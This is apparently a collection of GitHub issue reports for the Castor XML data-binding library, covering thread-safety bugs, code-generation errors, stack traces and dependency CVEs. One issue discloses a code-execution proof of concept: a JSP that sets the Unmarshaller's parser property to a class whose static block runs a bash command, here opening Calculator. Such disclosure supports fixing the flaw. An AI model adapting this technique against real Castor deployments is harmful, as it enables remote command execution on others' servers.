We are using castor-xml-1.3.2.jar for Xml data binding. In production we had an issue where the amount field which is of type BigDecimal, was getting swapped with other amount value from different xml document and thread at the time of un-marshalling. When we analyzed further we found the issue with PrimitiveObjectFactory class which internally has static Map of handlers to handle different data types. This handler is used to create the respective data type objects with the values passed from SAX parser. But the handler maintains a state with fields Class<?> type; String value; Object object; in PrimitiveObject class which is super class of all the handlers and which is not thread safe.

Earlier we thought that the issue is only for Big-Decimal but its is for any other data type as well.

Hi, wguttmn!
This error occurred at (JClassRegistry.java:467) when substring based on the logs below

Caused by: java.lang.StringIndexOutOfBoundsException: String index out of range: -1
	at java.lang.String.substring(String.java:1911)
	at org.exolab.castor.builder.JClassRegistry.ofTheSameType(JClassRegistry.java:467)
	at org.exolab.castor.builder.JClassRegistry.printStatistics(JClassRegistry.java:424)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:753)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:690)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:587)
	at org.codehaus.mojo.castor.GenerateMojo.processFile(GenerateMojo.java:530)

Here is the source code

private boolean ofTheSameType(final List<String> collisions) {
    boolean allSame = true;
    Iterator<String> iterator = collisions.iterator();
    String typeString = null;
    while (iterator.hasNext()) {
      String xPath = iterator.next();
      String newTypeString = xPath.substring(xPath.indexOf("[") + 1, xPath.indexOf("]"));// error occurred here
      if (typeString != null) {
        if (!typeString.equals(newTypeString)) {
          allSame = false;
          break;
        }
      } else {
        typeString = newTypeString;
      }
    }
    return allSame;
  }

I do not know much about the castor.But, the xPath`s value may have many diffrent types, such as
1.normal
a[bcdefg]h
2.only have [
a[bcdefgh
3.only have ]
abcde]fgh
4.none
abcdefgh
5.strange
ab]cde[fgh

From these types, type 1 and 4 offen appear in xPath.But the method ofTheSameType does not handle type 4.

The above is my analysis, please refer to.

Documentation at http://castor-data-binding.github.io/castor/ has non-working links

Hi which castor version support jakarta?

Release Castor 1.4.0 and test integration with Sonatype setup.

Caused by: java.lang.IllegalArgumentException: month 66 is out of range:  1 <= month <= 12
    at org.exolab.castor.types.DateTimeBase.setMonth(DateTimeBase.java:250)
    at org.exolab.castor.types.Date.parseDateInternal(Date.java:293)
    at org.exolab.castor.types.Date.parseDate(Date.java:240)
    at org.exolab.castor.xml.schema.util.DatatypeHandler.guessType(DatatypeHandler.java:181)
    at org.exolab.castor.xml.schema.util.XMLInstance2SchemaHandler.endElement(XMLInstance2SchemaHandler.java:220)
    at org.apache.xerces.parsers.AbstractSAXParser.endElement(Unknown Source)
    at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanEndElement(Unknown Source)
    at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl$FragmentContentDispatcher.dispatch(Unknown Source)
    at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
    at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
    at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
    at org.apache.xerces.parsers.XMLParser.parse(Unknown Source)
    at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source)
    at org.apache.xerces.jaxp.SAXParserImpl$JAXPSAXParser.parse(Unknown Source)
    at org.exolab.castor.xml.schema.util.XMLInstance2Schema.createSchema(XMLInstance2Schema.java:143)
    at org.exolab.castor.xml.schema.util.XMLInstance2Schema.createSchema(XMLInstance2Schema.java:120)

Fix:
In https://github.com/castor-data-binding/castor/blob/1.3.2/schema/src/main/java/org/exolab/castor/xml/schema/util/DatatypeHandler.java
At line:180 after these

try {
      Date.parseDate(value);
      return DATE_TYPE;
    } catch (ParseException px) {
    } 

catch the IllegalArgumentException also

catch (java.lang.IllegalArgumentException px) {
}

Update spring.version from 4.2.5.RELEASE (4.3.0.RELEASE in snapshot) so as to address multiple security threats reported by OWASP Dependency-check.

CVE-2016-9878 (Severity 5.0)
An issue was discovered in Pivotal Spring Framework before 3.2.18, 4.2.x before 4.2.9, and 4.3.x before 4.3.5. Paths provided to the ResourceServlet were not properly sanitized and as a result exposed to directory traversal attacks.

CVE-2018-1272 (Severity 6.0)
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.

CVE-2016-5007 (Severity 5.0)
Both Spring Security 3.2.x, 4.0.x, 4.1.0 and the Spring Framework 3.2.x, 4.0.x, 4.1.x, 4.2.x rely on URL pattern mappings for authorization and for mapping requests to controllers respectively. Differences in the strictness of the pattern matching mechanisms, for example with regards to space trimming in path segments, can lead Spring Security to not recognize certain paths as not protected that are in fact mapped to Spring MVC controllers that should be protected. The problem is compounded by the fact that the Spring Framework provides richer features with regards to pattern matching as well as by the fact that pattern matching in each Spring Security and the Spring Framework can easily be customized creating additional differences.

CVE-2018-1270 (Severity 7.5)
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.

CVE-2018-1258 (Severity 6.5)
Spring Security in combination with Spring Framework versions prior to 5.0.6 contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.

CVE-2018-1271 (Severity 4.3)
Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.

Adding the following in bindings.xml generates code that does not compile.

    <elementBinding name="capability">
        <member collection="set" />
    </elementBinding>

Specifically, the generated class includes the following code:

    private java.util.Set<java.lang.String> capabilityList;

...

    /**
     * Method getCapability.
     * 
     * @param index
     * @throws java.lang.IndexOutOfBoundsException if the index
     * given is outside the bounds of the collection
     * @return the value of the java.lang.String at the given index
     */
    public java.lang.String getCapability(final int index) throws java.lang.IndexOutOfBoundsException {
        // check bounds for index
        if (index < 0 || index >= this.capabilityList.size()) {
            throw new IndexOutOfBoundsException("getCapability: Index value '" + index + "' not in range [0.." + (this.capabilityList.size() - 1) + "]");
        }

        return (java.lang.String) capabilityList.get(index);
    }

This code does not compile because java.util.Set does not have a get(int index) method

Looking at org.exolab.castor.builder.factory.CollectionMemberAndAccessorFactory line 331 calls:

this.createGetByIndexMethod(fieldInfo, jClass, useJava50);

Either createGetAndSetMethods(...) or createGetByIndexMethod(...) should check if the collection is a Set or SortedSet and skip the generation of this method. You could also add a boolean hasGetByIndex() method to JCollectionType to make this code cleaner.

Minor issue, but there does not seem to be a tag/release for 1.4.1. Though it does exist in maven, and sources show 1.4.2. Can a 1.4.1 tag/release be created? Thanks!

Hello,

I'm using ant integration (org.castor.anttask.CastorCodeGenTask) to generate Descriptor classes.
I'm using ant through gradle.
But I have an issue using binding.xml and wrapper="true" with a boolean.

ant gradle integration
build.gradle

    task castor(description: "Generate Java source files from XSD.", group: "build") {

	doLast() {

		def srcHome = "${projectDir}/src";

		ant.taskdef(name:"castorSrcgen",
					classname:"org.castor.anttask.CastorCodeGenTask",
					classpath:configurations.castorAnt.asPath )
					
		ant.castorSrcgen(file:"${srcHome}/config/edi/BaseTypes.xsd", bindingFile:"${srcHome}/config/edi/binding.xml",
				todir:"${srcHome}", package:"tea.edi.binding", types:"j2", warnings:"false", verbose:"true" )


	}
}

BaseType.xsd

<?xml version="1.0"?>
<xs:schema xmlns:b="http://schemas.microsoft.com/BizTalk/2003" xmlns="http://TEA.Ecar.BaseSchemas" attributeFormDefault="unqualified" 
		elementFormDefault="qualified" targetNamespace="http://TEA.Ecar.BaseSchemas" xmlns:xs="http://www.w3.org/2001/XMLSchema">
	
	
	<xs:complexType name="CaracteristiquesVehicule">
		<xs:attribute name="priorite" type="xs:boolean" use="optional" />
		
	</xs:complexType>
	
</xs:schema>

binding.xml

    <binding defaultBindingType="type">
	  <namingXML>
		<elementName>
			<suffix>Elt</suffix>
		</elementName>
	</namingXML>
	
	<attributeBinding name="/complexType:CaracteristiquesVehicule/@priorite">
		<member wrapper="true" />
	</attributeBinding>
	
   </binding>

This will generated a CaracteristiquesVehiculeDescriptor like this :

//-- priorite
        desc = new org.exolab.castor.xml.util.XMLFieldDescriptorImpl(java.lang.Boolean.class, "priorite", "priorite", org.exolab.castor.xml.NodeType.Attribute);
        handler = new org.exolab.castor.xml.XMLFieldHandler() {
            @Override
            public java.lang.Object getValue( java.lang.Object object ) 
                throws IllegalStateException
            {
                CaracteristiquesVehicule target = (CaracteristiquesVehicule) object;
                return target.getPriorite();
            }
            @Override
            public void setValue( java.lang.Object object, java.lang.Object value) 
                throws IllegalStateException, IllegalArgumentException
            {
                try {
                    CaracteristiquesVehicule target = (CaracteristiquesVehicule) object;
                    // if null, use delete method for optional primitives 
                    if (value == null) {
                        target.deletePriorite();
                        return;
                    }
                    target.setPriorite( ((java.lang.Boolean) value));
                } catch (java.lang.Exception ex) {
                    throw new IllegalStateException(ex.toString());
                }
            }
            @Override
            @SuppressWarnings("unused")
            public java.lang.Object newInstance(java.lang.Object parent) {
                return null;
            }
        };
        desc.setSchemaType("boolean");
        desc.setHandler(handler);
        desc.setMultivalued(false);
        addFieldDescriptor(desc);

But, because we use "wrapper="true" target.deletePriorite(); doesn't exist in the CaracteristiquesVehicule class generated.

After upgrading castor from 1.3.1 to 1.4.0, we had a RuntimeException involving FieldMappingCollectionType.collection. (see attached).

FieldMappingCollectionType.txt

The problems seems to have been discussed previously here as "Refactoring of FieldMappingCollectionType breaks backward compability " but I cannot find an issue that was logged... hence this issue.

Note also, from Stack Overflow

I browsed the castor source code and as far as I can tell, they broke the MappingTool
somewhere between 1.3 and 1.3.2 when they redesigned BindXmlNodeType to be an enum class
instead of a regular class. There is some code where they are looking for an
BindXmlNodeType.element, but now that BindXmlNodeType is an enum they need to look up
ELEMENT (caps).

I would like to be able marshall and unmarshall the following XML:

<cristalquery name="TestQuery" version="0">
    <query language="existdb:xquery"><![CDATA[
<TRList>{
    for $prop in collection('weighbridge')/Property[@name='Type']
    where $prop = "Weighbridge"
    return local:queryTransaction(util:collection-name($prop))
}</TRList>
    ]]></query>
</cristalquery>

As you can see it contains an XQuery, and to store that unescaped I am need to use CDATA. Currently I am planning to implemenet a custom FieldHandler, but I think it would be great if castor could support CDATA with a mapping like bellow, i.e. uses node="cdata" in the last field:

<mapping>
    <class name="org.cristalise.kernel.querying.Query">
        <map-to xml="cristalquery"/>
        <field name="name" type="string" direct="false">
            <bind-xml name="name" node="attribute" />
        </field>
        <field name="version" type="integer" direct="false">
            <bind-xml name="version" node="attribute" />
        </field>
        <field name="language" type="string" direct="false">
            <bind-xml name="language" location="query" node="attribute" />
        </field>
        <field name="query" type="string" direct="false">
            <bind-xml name="query" node="cdata" />
        </field>
    </class>
</mapping>

org.w3c.dom.CDATASection is a subclass of Text, so it should not be hard to handle the ![CDATA...]] wrapper around that text.

Using castor-xml-1.4.0, I noticed that there is a duplicate stax-api dependency:

• org.codehaus.castor:castor-xml:jar:1.4.0 (compile) Information
  • org.codehaus.castor:castor-core:jar:1.4.0 (compile) Information
  • commons-lang:commons-lang:jar:2.6 (compile) Information
  • stax:stax:jar:1.2.0 (compile) Information
    • stax:stax-api:jar:1.0.1 (compile) Information
  • javax.xml.stream:stax-api:jar:1.0-2 (compile) Information

One should prevail. Not against the last one.

Added fix as a commit along with previous pull request existing. See #58

Check 235a4f3

Code execution when set the Property of the Unmarshaller

Send the request

• Payload: any string

http://127.0.0.1:8080/xxxxxx/castor.jsp?param=any-string

<%@ page contentType="text/html;charset=UTF-8"  pageEncoding="UTF-8" %>
<%@ page import="java.io.ByteArrayInputStream" %>
<%@ page import="org.exolab.castor.xml.Unmarshaller" %>
<%@ page import="javax.xml.transform.stream.StreamSource" %>

<%
    try {
        String parameter = request.getParameter("param");
        ByteArrayInputStream is = new ByteArrayInputStream(parameter.getBytes());
        Unmarshaller unmarshaller = new Unmarshaller();
        unmarshaller.setProperty("org.exolab.castor.parser", "test.security.CmdTest");
        unmarshaller.unmarshal(new StreamSource(is));
    } catch (Exception e) {
        e.printStackTrace();
    }
    out.println("over....");
%>

package test.security;

public class CmdTest {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","open -a Calculator.app"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

<dependency>
  <groupId>org.codehaus.castor</groupId>
  <artifactId>castor-xml</artifactId>
  <version>1.4.1</version>
</dependency>

Recently we would like to upgrade castor xml and castor core from version 1.1.2.1 to 1.4.1 for fixing CVE issue. but we get below exception. as per debug i found laster castor xml cannot handle location attribute. please help to check if it's issue. if not kindly give suggetion how to fix. you can find details in below.

java.lang.IllegalStateException: No Introspector defined in properties!
at org.exolab.castor.xml.util.resolvers.ByIntrospection.internalResolve(ByIntrospection.java:80)
at org.exolab.castor.xml.util.resolvers.AbstractResolverClassCommand.resolve(AbstractResolverClassCommand.java:50)
at org.exolab.castor.xml.util.resolvers.CastorXMLStrategy.getDescriptor(CastorXMLStrategy.java:134)
at org.exolab.castor.xml.util.resolvers.CastorXMLStrategy.resolveClass(CastorXMLStrategy.java:81)
at org.exolab.castor.xml.util.XMLClassDescriptorResolverImpl.resolve(XMLClassDescriptorResolverImpl.java:284)
at org.exolab.castor.xml.MarshalFramework.searchInheritance(MarshalFramework.java:499)
at org.exolab.castor.xml.StartElementProcessor.compute(StartElementProcessor.java:233)
at org.exolab.castor.xml.UnmarshalHandler.startElementProcessing(UnmarshalHandler.java:796)
at org.exolab.castor.xml.UnmarshalHandler.startElement(UnmarshalHandler.java:723)
at org.apache.xerces.parsers.AbstractSAXParser.startElement(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanStartElement(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl$FragmentContentDispatcher.dispatch(Unknown Source)
at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XMLParser.parse(Unknown Source)
at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source)
at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:694)
at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:589)

Data mapping file
`

<include href="com/test/BaseResponseVO-mapping.xml"/>

<class name="com.test.DetailsResponseVO"
		extends="com.test.BaseResponseVO"
		auto-complete="true">

	<map-to xml="response" />
	
	<field name="userId" type="java.lang.String">
		<bind-xml name="userId" node="element" location="data"/>
	</field>
    		
</class>

`

sample xml response:
<response> <data> <userId></userId> </data> </response>

Hi ,

while testing i observe that the travis-ci builds are failing on amd64 for both of the oraclejdk7 & 8. The log can be tracked here https://travis-ci.com/github/sanjaymsh/castor/builds/216199573.

Please have a look on this.

Thanks !!

The AbstractProperties class attempts to load a properties file with:

URL url = getClass().getResource(filename);

This is not guaranteed to work in modular class loading environments such as in OSGi or some JavaEE containers.

Perhaps it'd be better to use the _applicationClassLoader to load resources. But even this is currently not guaranteed to work at present because XMLContext forces a specific ClassLoader, which itself may not be the correct one.

castor-xml 1.3.3 has a compile dependency: commons-collections:commons-collections 3.2.1

commons-collections has a deserialization vulnerability that is flagged as CVE level 9 by Sonatype Nexus Pro.

commons-collections4 v4.1 includes the critical security fix COLLECTIONS-580. Quoting from Release Notes: Serialization support for unsafe classes in the functor package has been removed completely as this can be exploited for remote code execution attacks. Classes considered to be unsafe are:

CloneTransformer
ForClosure
InstantiateFactory
InstantiateTransformer
InvokerTransformer
PrototypeCloneFactory
PrototypeSerializationFactory
WhileClosure.

Additional info:

Apache Commons statement to widespread Java object de-serialisation vulnerability
Release Notes for Apache Commons v4.1
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.

After generating a set of Java classes from an XSD with Castor, I see some (not all) of them cause a compiler error for invoking a non-existent constructor

java.lang.Object(String)

The XSD was downloaded from https://datex2.eu/schema/2/2_0/DATEXIISchema_2_2_3.xsd and then converted with the command line

java -cp "*" org.exolab.castor.builder.SourceGeneratorMain -i DATEXIISchema_2_2_3.xsd -types j2

Content of castorbuilder.properties:

org.exolab.castor.builder.javaclassmapping=type
org.exolab.castor.builder.javaVersion=5.0
org.exolab.castor.builder.nspackages=\
   http://example.com/schema/foo=com.example.schema.foo
org.exolab.castor.builder.primitivetowrapper=true

This affects almost exclusively classes whose name begins with an underscore, where the offending code looks like this:

/**
 * Field targetClass.
 */
private java.lang.Object targetClass = new java.lang.Object("ContactDetails");

public _ContactDetailsVersionedReference() {
    super();
    setTargetClass(new java.lang.Object("ContactDetails"));
}

The root element, D2LogicalModelfor the XSD mentioned, is also affected, though here it is the modelBaseVersion property.

Tested on 1.4.1 as downloaded from Maven Central.

There is a problem about the classname!
In the model castor-codegen of org.exolab.castor.builder.conflict.strategy.BaseClassNameConflictResolver.calculateXPathPrefix,
in some cases, when the input is like '/Voucher{http://www.your.org/Test/Space}/Name/Surname', but the output is 'WwwYourOrgTestSpace}NameSurname'.This is not a valid java identifier.

the source code below split the input string words, but not remove the invalid identifier in model castor-xml(org.castor.xml.JavaNamingImpl)

protected String calculateXPathPrefix(final String xpath) {
    String prefix = "";
    StringTokenizer stringTokenizer = new StringTokenizer(xpath, "/.");
    while (stringTokenizer.hasMoreTokens()) {
      String token = stringTokenizer.nextToken();
      // break on last token
      if (!stringTokenizer.hasMoreTokens()) {
        break;
      }
      if (token.startsWith(ExtendedBinding.COMPLEXTYPE_ID)
          || token.startsWith(ExtendedBinding.SIMPLETYPE_ID)
          || token.startsWith(ExtendedBinding.ENUMTYPE_ID)
          || token.startsWith(ExtendedBinding.GROUP_ID)) {
        token = token.substring(token.indexOf(":") + 1);
      }
      prefix += _sourceGenerator.getJavaNaming().toJavaClassName(token);
    }
    return prefix;
  }

fix:
add some code to remove "}" in model castor-xml(org.castor.xml.JavaNamingImpl)

public final String toJavaClassName(final String name) {

        if ((name == null) || (name.length() <= 0)) {
            // handle error
            return name; // -- for now just return name
        }
        // Remove namespace prefix (Andrew Fawcett, temporary until namespace
        // changes go in)
        int colon = name.indexOf(':');
        if (colon != -1) {
            return toJavaName(name.substring(colon + 1), true);
        }
        return toJavaName(name, true);

    } // -- toJavaClassName

Hi, wguttmn!
I met a NullPointerException, the following is error log

Caused by: java.lang.NullPointerException
	at org.exolab.castor.builder.info.CollectionInfo.<init>(CollectionInfo.java:100)
	at org.exolab.castor.builder.info.CollectionInfoJ2.<init>(CollectionInfoJ2.java:70)
	at org.exolab.castor.builder.factory.FieldInfoFactory.createCollection(FieldInfoFactory.java:208)
	at org.exolab.castor.builder.factory.FieldInfoFactory.createCollection(FieldInfoFactory.java:181)
	at org.exolab.castor.builder.factory.MemberFactory.createFieldInfoForContent(MemberFactory.java:229)
	at org.exolab.castor.builder.factory.SourceFactory.processComplexType(SourceFactory.java:2076)
	at org.exolab.castor.builder.factory.SourceFactory.processComplexType(SourceFactory.java:812)
	at org.exolab.castor.builder.factory.SourceFactory.createSourceCode(SourceFactory.java:368)
	at org.exolab.castor.builder.SourceGenerator.createClasses(SourceGenerator.java:932)
	at org.exolab.castor.builder.SourceGenerator.generateAllClassFiles(SourceGenerator.java:786)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:744)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:690)
	at org.exolab.castor.builder.SourceGenerator.generateSource(SourceGenerator.java:587)

Based on the logs:
the error happend at CollectionInfo.java in line 100

public CollectionInfo(final XSType contentType, final String name, final String elementName,
      final boolean useJava50, final FieldMemberAndAccessorFactory memberAndAccessorFactory,
      final FieldMemberAndAccessorFactory contentMemberAndAccessorFactory) {
    super(XSCollectionFactory.createCollection(SourceGeneratorConstants.FIELD_INFO_VECTOR,
        contentType, useJava50), name, memberAndAccessorFactory);

    **if (elementName.charAt(0) == '_') {// error occurred there**
      this._elementName = elementName.substring(1);
    } else {
      this._elementName = elementName;
    }

    this._methodSuffix =
        memberAndAccessorFactory.getJavaNaming().toJavaClassName(this.getElementName());
    this._parameterPrefix =
        memberAndAccessorFactory.getJavaNaming().toJavaMemberName(this.getElementName());
    this._content =
        new FieldInfo(contentType, "v" + this.getMethodSuffix(), contentMemberAndAccessorFactory);

    // indicates that - per definition - we are dealing with multi-valuedness
    new XMLInfoNature(this).setMultivalued(true);
  } // -- CollectionInfo

source code of (MemberFactory.java:229), the input elementName is null

public FieldInfo createFieldInfoForContent(final XMLBindingComponent component,
      final XSType xsType, final boolean useJava50) {
    String fieldName = "content";// new xsType()???
    if (getConfig().useOldFieldNaming()) {
      StringUtils.leftPad(fieldName, 1, '_');
    }
    if (component.getContentMemberName() != null) {
      fieldName = component.getContentMemberName();
    }
    FieldInfo fInfo = null;
    if (xsType.isCollection()) {
      fInfo = this.getInfoFactory().createCollection(((XSListType) xsType).getContentType(),
          fieldName, null, getJavaNaming(), useJava50);// line 229
    } else {
      fInfo = this.getInfoFactory().createFieldInfo(xsType, fieldName);
    }
    fInfo.setComment("internal content storage");
    if (xsType instanceof XSString) {
      fInfo.setDefaultValue("\"\"");
    }
    if (fInfo.hasNature(XMLInfoNature.class.getName())) {
      XMLInfoNature xmlNature = new XMLInfoNature(fInfo);
      xmlNature.setNodeType(NodeType.TEXT);
      xmlNature.setRequired(false);
      xmlNature.setNodeName("#text");
    }
    return fInfo;
  }

Can you help me find out the reson? Many thanks.

I am trying to implement a CDATAFieldHandler, and it works fine except that the string value returned by the getValue() is escaped inthe final marshalled xml. Marshalling is done by this code segment:

    StringWriter sWriter = new StringWriter();
    Marshaller marshaller = mappingContext.createMarshaller();
    marshaller.setWriter(sWriter);
    marshaller.setMarshalAsDocument(false);

    if (obj instanceof Query) marshaller.addProcessingInstruction(Result.PI_DISABLE_OUTPUT_ESCAPING, "");

    marshaller.marshal(obj);
    return sWriter.toString();

mappingContext is an instance of XMLContext initalised at boot time by loading all of our mappings.

My test unmarshalls a hand-written xml and marshalls it back. Unmarshall works, the Object created correctly, but marshaller will convert the string escaped.

I use castor 1.4.1. and JavaSE 1.8

There is a conflict with ValidationMessages.properties provided in castor-xml.
According to validation specification there should be only one ValidationMessage.properties available in the classpath. However since castor-xml already includes one, after we included jasperreports in our application broke validation broke. Actually the worst part is that it works randomly on different system (due to non deterministic jar loading order).

Relevant issues:
https://hibernate.atlassian.net/browse/BVAL-252
https://hibernate.atlassian.net/browse/BVAL-251
http://stackoverflow.com/questions/11599208/conflict-between-validationmessages-properties-files

Possible solution:
since it is a library castor should include it's own prefixed version of ValiadtionMessage.properties.
ResourceBundleLocator resourceBundleLocator = new PlatformResourceBundleLocator("CastorValidationMessages");
config.messageInterpolator(new ResourceBundleMessageInterpolator(resourceBundleLocator));

According to http://jakarta.apache.org/oro/ the project is retired.

As a result, how about marking JakartaOroEvaluator as @Deprecated?

Hi,
We were using castor 1.3.2 for auto-generating a soap web service client and found this problem.
In this version for Types you have replaced the static method "valueOf" by "fromValue", which is nicer from data perspective, however we found there is a problem with concurrent threads.

Here is an example of the current code auto generated:

public static MyType fromValue(String value)
{
    MyType c = (MyType)enumConstants.get(value);
    if(c != null)
        return c;
    else
        throw new IllegalArgumentException(value);
 }

As the method is static all the threads will access this method concurrently at unmarshalling step.
At the moment of one thread doing "if(c!=null)", another thread can change the reference of "c" in the line "MyType c = (MyType) enumConstants.get(value)".

We had the issue and after a lot of research identified this problem.
We have fixed this in the meantime adding a synchronized block (to avoid synchronize method)

static final Object monitorObj = new Object();
public static MyType fromValue(String value)
{
    synchronized (monitorObj) {
        MyType c = (MyType) enumConstants.get(value);
        if(c != null)
            return c;
        else
            throw new IllegalArgumentException(value);
    }
}

But obviously the idea is to help in improving this very useful framework,

Thanks,

Investigate whether anything coul dbe done there ... to ease migration of mailing lists.

Hi Team,
Getting below issue:

Input:

inheritedAttributes:
[XMLFieldDesciptor: maxExecuteTimeInMillis AS max-execute-time-in-millis]

allAttributes-
[XMLFieldDesciptor: pooled AS pooled,
XMLFieldDesciptor: separateThread AS separate-thread,
XMLFieldDesciptor: delayPeriod AS delay-period,
XMLFieldDesciptor: maxExecuteTimeInMillis AS max-execute-time-in-millis,
XMLFieldDesciptor: maxExecuteTimeInMillis AS max-execute-time-in-millis]

Object XMLFieldDesciptor: maxExecuteTimeInMillis AS max-execute-time-in-millis is added twice in allAttributes but in inheritedAttributes it gets calculated as 1.

Code which had issue:
// -- get local attribute descriptors by filtering out inherited ones
XMLFieldDescriptor[] inheritedAttributes = _extends.getAttributeDescriptors();
XMLFieldDescriptor[] allAttributes = localAttributes;
localAttributes = new XMLFieldDescriptor[allAttributes.length - inheritedAttributes.length]; 4
localIdx = 0;
for (int i = 0; i < allAttributes.length; i++) {
XMLFieldDescriptor desc = allAttributes[i];
boolean isInherited = false;
for (int idx = 0; idx < inheritedAttributes.length; idx++) {
if (inheritedAttributes[idx].equals(desc)) {
isInherited = true;
break;
}
}
if (!isInherited) {

  localAttributes[localIdx] = desc;
  ++localIdx;
}

}

Exception on line:

java.lang.NullPointerException
at org.exolab.castor.xml.util.XMLClassDescriptorImpl.validate(XMLClassDescriptorImpl.java:1070)
at org.exolab.castor.xml.util.XMLClassDescriptorImpl.validate(XMLClassDescriptorImpl.java:910)
at org.exolab.castor.xml.util.XMLClassDescriptorImpl.validate(XMLClassDescriptorImpl.java:910)
at org.exolab.castor.xml.Validator.validate(Validator.java:135)
at org.exolab.castor.xml.UnmarshalHandler.endElement(UnmarshalHandler.java:915)
at org.exolab.castor.xml.util.DOMEventProducer.process(DOMEventProducer.java:250)
at org.exolab.castor.xml.util.DOMEventProducer.process(DOMEventProducer.java:183)
at org.exolab.castor.xml.util.DOMEventProducer.start(DOMEventProducer.java:111)
at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:637)
at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:747)
at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:877)

Please look into it.

Fix broken reference guide links for single HTML and PDF

• Add correct mailing lists (freelists.org)
• Update archive information

Hello,

Long time ago, we used castor gen 1.3.1 and spotted an issue in the equals generation that we fixed and kept in our own version of castor-generator. Now we plan to upgrade to 1.4.1 and I checked if the issue is still there: yes it is.

In https://github.com/castor-data-binding/castor/blob/master/codegen/src/main/java/org/exolab/castor/builder/factory/SourceFactory.java

the block starting on line 1419:

 if (temp.getType().isPrimitive()) {
    jsc.add("if (this.");
    jsc.append(name);
    jsc.append(" != temp.");
    jsc.append(name);
    jsc.append(")");
  } else {

should be replaced by

               if (temp.getType().isPrimitive()) {
                    jsc.add("if (this.");
                    jsc.append(name);
                    jsc.append(" != temp.");
                    jsc.append(name);
                    jsc.append(")");
                    jsc.indent();
                    jsc.add("return false;");
                    jsc.unindent();
                } else {

And on line 1570 right after the

       if (state.getFieldInfoForChoice() != null
                && name.equals(state.getFieldInfoForChoice().getName())) {
            continue;
        }

block, it should be added

        if (name.startsWith("enumConstants")) {
            continue;
        }

Hope it helps

Your maven pom.xml is missing the license, like this:

<licenses>
    <license>
      <name>LGPL 2.1</name>
      <url>http://www.gnu.org/licenses/lgpl-2.1.html</url>
      <comments>See discussion at http://whatever.com/license for more details.</comments>
      <distribution>repo</distribution>
    </license>
  </licenses>

In DateFieldHandler, the input is parse in Date or DateTime according to _allowNoTime value.
By default, it's set to false and I wonder how set to true ?

Apply new formatter globlly to all src/main/java and /src/test/java folders of all modules, using the Google formatter available in src/tools/eclipse

Create new project mailing lists, at least

• ann
• dev
  *user

During unmarshalling, Castor throws a validation error concerning unresolved id reference. This seems to be a false positive, as everything looks fine with lenient id validation enabled.

I've created a minimal example to demonstrate the issue:

example.zip

The problem seems to be, that the referenced object is located inside a list. The validator does not step into the list element and does not register the referenced object.

Castor Version: 1.4.1
Stack trace:

Exception in thread "main" org.exolab.castor.xml.MarshalException: ValidationException: ClassDescriptorResolver from context must not be null!{File: [not available]; line: 14; column: 12}
	at org.exolab.castor.xml.Unmarshaller.convertSAXExceptionToMarshalException(Unmarshaller.java:832)
	at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:703)
	at org.exolab.castor.xml.Unmarshaller.unmarshal(Unmarshaller.java:589)
	at de.CastorValidateTest.main(CastorValidateTest.java:96)
Caused by: ValidationException: ClassDescriptorResolver from context must not be null!
	at org.exolab.castor.xml.Validator.checkUnresolvedIdrefs(Validator.java:185)
	at org.exolab.castor.xml.EndElementProcessor.compute(EndElementProcessor.java:377)
	at org.exolab.castor.xml.UnmarshalHandler.endElement(UnmarshalHandler.java:473)

See spring-projects/spring-ldap#382 about badge integration.

Hello, please consider make it Java 11 compatible, thanks! Please find below warning for your reference :

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.exolab.castor.xml.BaseXercesJDK5Serializer (file:/C:/Users/hkwong/.gradle/caches/modules-2/files-2.1/org.codehaus.castor/castor-xml/1.4.1/2cee800a008291305ac4f3a67b674f9c6cb1d07a/castor-xml-1.4.1.jar) to constructor com.sun.org.apache.xml.internal.serialize.XMLSerializer()
WARNING: Please consider reporting this to the maintainers of org.exolab.castor.xml.BaseXercesJDK5Serializer
